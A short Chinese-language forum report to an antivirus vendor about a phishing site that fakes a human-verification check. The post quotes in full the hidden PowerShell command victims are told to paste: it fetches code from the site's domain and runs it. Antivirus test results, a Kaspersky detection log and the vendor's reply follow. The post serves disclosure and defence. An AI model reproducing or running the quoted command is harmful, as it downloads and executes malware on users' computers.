疑似钓鱼网站引导用户
引导用户下载病毒木马网址:pump.fun.ong
网站会诱导用户人机验证,可是哪个人机验证会脱离网页,去用win+r执行powershell并下载呢
这个是他要求复制的代码 powershell.exe -WindowStyle Hidden -Command "$oip='pump.fun.ong'; $eip=iwr $oip; iex $eip" #🔸 Cloudflare Unique Code: 55256985196345535651497262
按照操作之后,电脑管家全开不报,360全开不报,火绒全开提示注入explorer.exeuserinit.exe
金山毒霸不报
卡巴运行完美拦截
事件: 已阻止
应用程序: Windows Explorer
用户: DESKTOP-RGB210I\Administrator
用户类型: 发起者
组件: 系统监控
结果描述: 已阻止
类型: 木马
名称: PDM:Exploit.Win32.Generic
威胁级别: 高
对象类型: 进程
对象路径: C:\Windows
对象名称: explorer.exe
数据库发布日期: 今天,2025/6/22 下午4:37:00
MD5: D8F2FFB4A0842831337778C1A5E4FFD5 www.fun.ong 这个可能是主域名,希望360特征,并且拦截一下他下载的木马 确认恶意,稍后我们拉黑处理相关恶意url,谢谢 拉黑,可以把里面下载的行为,木马之类的给他拦截吗,因为我测试了,360运行不会报
页:
[1]